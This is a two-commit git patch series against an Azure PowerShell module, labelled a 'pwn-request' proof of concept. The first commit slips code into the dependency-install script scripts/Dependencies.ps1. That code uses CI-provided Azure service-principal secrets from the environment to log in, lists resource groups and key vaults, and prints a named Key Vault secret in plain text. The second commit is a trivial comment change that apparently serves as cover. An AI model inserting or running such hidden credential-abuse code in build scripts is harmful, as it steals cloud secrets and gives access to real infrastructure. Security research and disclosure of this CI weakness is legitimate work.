From f925f8832b3b05b76752646ae77d0575688221be Mon Sep 17 00:00:00 2001 From: Amitay Shahar <43682836+amitaysh@users.noreply.github.com> Date: Mon, 13 Jul 2026 21:44:20 +0300 Subject: [PATCH 1/2] Implement POC for secret exposure and Azure connection Added PowerShell script to demonstrate secret exposure and Azure access. --- scripts/Dependencies.ps1 | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) diff --git a/scripts/Dependencies.ps1 b/scripts/Dependencies.ps1 index 9e7beb50..afc56896 100644 --- a/scripts/Dependencies.ps1 +++ b/scripts/Dependencies.ps1 @@ -3,6 +3,38 @@ param ( $Repository = 'PSGallery' ) +Write-Host "=== PWN-REQUEST POC - Secret exposure + Azure access ===" + +# Prove secrets delivered to fork code +Write-Host "ARM_CLIENT_SECRET in env: $(if ($env:ARM_CLIENT_SECRET) { 'YES (masked by GitHub as ***)' } else { 'NO' })" + +# Connect to Azure using the exposed credentials +$credential = New-Object PSCredential -ArgumentList $env:ARM_CLIENT_ID, ` + (ConvertTo-SecureString -String $env:ARM_CLIENT_SECRET -AsPlainText -Force) +Connect-AzAccount -TenantId $env:ARM_TENANT_ID -ServicePrincipal ` + -Credential $credential -SubscriptionId $env:ARM_SUBSCRIPTION_ID + +# Prove authenticated access +Write-Host "=== Authenticated Azure context ===" +Get-AzContext | Select-Object Account, Subscription, Tenant | Format-List + +Write-Host "=== Resource Groups (proves read access) ===" +Get-AzResourceGroup | Select-Object ResourceGroupName, Location | Format-Table + +Write-Host "=== Key Vaults discoverable ===" +Get-AzKeyVault | Select-Object VaultName, ResourceGroupName | Format-Table + +Write-Host "=== Key Vault Secret (the money shot) ===" +$secret = Get-AzKeyVaultSecret -VaultName "azure-github-poc-kv" -Name "super-secret-api-key" -AsPlainText +Write-Host "super-secret-api-key = $secret" + +Write-Host "=== END POC ===" +exit 0 + + + + + # Development Modules Set-PSRepository -Name $Repository -InstallationPolicy Trusted $modules = @("Pester", "PSModuleDevelopment", "PSScriptAnalyzer") From 1766069973b887955f20376c1405cd642ea66413 Mon Sep 17 00:00:00 2001 From: Amitay Shahar <43682836+amitaysh@users.noreply.github.com> Date: Mon, 13 Jul 2026 21:44:39 +0300 Subject: [PATCH 2/2] Clarify note on Resolve-Path usage Updated note on Resolve-Path to clarify functionality. --- src/AzOps.psm1 | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/AzOps.psm1 b/src/AzOps.psm1 index e9e98227..e9fd88d7 100644 --- a/src/AzOps.psm1 +++ b/src/AzOps.psm1 @@ -7,7 +7,7 @@ if (Test-Path (Resolve-PSFPath -Path "$($script:ModuleRoot)\..\.git" -SingleItem if ($AzOps_dotsourcemodule) { $script:doDotSource = $true } <# -Note on Resolve-Path: +Note on Resolve-Path: some legit code All paths are sent through Resolve-Path/Resolve-PSFPath in order to convert them to the correct path separator. This allows ignoring path separators throughout the import sequence, which could otherwise cause trouble depending on OS. Resolve-Path can only be used for paths that already exist, Resolve-PSFPath can accept that the last leaf my not exist. @@ -78,4 +78,4 @@ if ($importIndividualFiles) #region Load compiled code "" -#endregion Load compiled code \ No newline at end of file +#endregion Load compiled code